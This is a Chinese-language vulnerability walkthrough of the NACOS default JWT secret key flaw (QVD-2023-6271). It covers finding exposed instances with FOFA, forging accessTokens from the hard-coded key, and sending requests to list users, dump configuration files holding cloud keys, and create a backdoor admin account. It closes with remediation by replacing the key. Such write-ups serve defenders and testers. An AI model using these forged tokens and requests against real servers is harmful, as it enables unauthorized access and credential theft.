漏洞实战(1)：NACOS默认密钥漏洞QVD-2023-6271

1. 原理

2. 危害

3. 攻击

1. 资产发现

2. 漏洞利用

4. 防御

1、原理

NACOS^[1]，/nɑ:kəʊs/，是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。

在 <=2.2.0、<=1.4.4的版本中，NACOS的配置文件conf/application.properties存在默认密钥nacos.core.auth.plugin.nacos.token.secret.key=SecretKey012345678901234567890123456789012345678901234567890123456789。

该密钥用于加密用户帐号，生成用户登陆后的身份令牌accessToken，类型是JWT^[2]（JSON Web Token）。

攻击者可以使用默认密钥和常见帐号生成身份令牌，从而绕过身份认证，直接获得NACOS的访问权限。

2、危害

攻击者获得NACOS的访问权限后，会查看NACOS管理的所有配置文件，翻找里面的帐号密码，例如云服务的AKSK、Java程序的JDBC，从而获得对应服务的访问权限。

3、攻击

3.1、资产发现

搜索资产

FOFA^[3]：app="NACOS"

查看版本

# 请求地址

/nacos/v1/console/server/state

# 响应示例

{"version":"2.2.0","standalone_mode":"standalone","function_mode":null}

3.2、漏洞利用

部署服务

1、下载地址：2.2.0 (Dec 14, 2022)^[4]、1.4.4 (Aug 8th, 2022)^[5]

2、打开鉴权开关：将配置文件conf/application.properties中的 nacos.core.auth.enabled设置为on。

3.1、Linux中部署：配置环境变量export JAVA_HOME=/usr/lib/jvm/java-17-openjdk-amd64、开启服务bash bin/startup.sh -m standalone、关闭服务 bash bin/shutdown.sh。

3.2、Windows中部署：配置环境变量此电脑 - 属性 - 高级系统设置 - 高级 - 环境变量 – JAVA_HOME= C:Program FilesJavajdk1.8.0_361、开启服务bin/startup.cmd-m standalone、关闭服务binshutdown.cmd 。

生成accessToken

生成地址：JWT官网^[6]

关键参数：

1、常见帐号：例如nacos、nac0s、nacosss、nacos1、admin

2、默认密钥：SecretKey012345678901234567890123456789012345678901234567890123456789

其他参数：

3、签名算法：HS256（HMAC SHA256，JWT默认）

4、过期时间：在Linux中使用命令date +%s -d '2024-03-10 00:00:00'生成过期时间

5、是否启用Base64编码：是（NACOS建议）

查看帐号：常用于渗透测试或漏洞扫描，证明漏洞存在。

# 请求地址（GET）

/nacos/v1/auth/users?accessToken=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTcxMDAwMDAwMH0.l5OewNgzUxgyFdy7aAQBNfst7FOZ9bE9cHoLd9dMX74 &pageNo=1&pageSize=9&search=accurate

# 响应示例

{"totalCount":1,"pageNumber":1,"pagesAvailable":1,"pageItems":[{"username":"nacos","password":"$2a$10$EuWPZHzz32dJN7jexM34MOeYirDdFAZm2kuWj7VEOJhhZkDrxfvUu"}]}

查看配置：常用于红蓝对抗，翻找帐号密码，获取更多权限。

# 请求地址（GET）

/nacos/v1/cs/configs?dataId=&group=&appName=&config_tags=&pageNo=1&pageSize=10&tenant=&search=accurate&accessToken=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTcxMDAwMDAwMH0.l5OewNgzUxgyFdy7aAQBNfst7FOZ9bE9cHoLd9dMX74

# 响应示例

{"totalCount":1,"pageNumber":1,"pagesAvailable":1,"pageItems":[{"id":"740458855550423040","dataId":"aliyun.yaml","group":"DEFAULT_GROUP","content":"aliyun:n    access-key-id: RzRRFE5tQqsxAieELkMDLTAIn    access-key-secret: 52dW2iDdPzmddUBEDlKHej5uYddK89","md5":null,"encryptedDataKey":null,"tenant":"","appName":"","type":"yaml"}]}

创建帐号，登陆后台，查看配置：同红蓝对抗场景。

# 请求地址（POST）

/nacos/v1/auth/users?accessToken=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTcwOTk5MTEwOX0.h2WWx4rr9_pxbYzRe2Psrw5JDY3mKzXiUK-FhMKCkto&username=hacker&password=123456

# 响应示例

{"code":200,"message":null,"data":"create user ok!"}

### The default token(Base64 String):

nacos.core.auth.default.token.secret.key=SecretKey012345678901234567890123456789012345678901234567890123456789

### 2.1.0 版本后    

nacos.core.auth.plugin.nacos.token.secret.key=SecretKey012345678901234567890123456789012345678901234567890123456789

### 原始密钥（刚好32字符）

ThisIsMyCustomSecretKey012345678

### The default token(Base64 String):

nacos.core.auth.default.token.secret.key=VGhpc0lzTXlDdXN0b21TZWNyZXRLZXkwMTIzNDU2Nzg=

### 2.1.0 版本后

nacos.core.auth.plugin.nacos.token.secret.key=VGhpc0lzTXlDdXN0b21TZWNyZXRLZXkwMTIzNDU2Nzg=

原文始发于微信公众号（OneMoreThink）：漏洞实战(1)：NACOS默认密钥漏洞QVD-2023-6271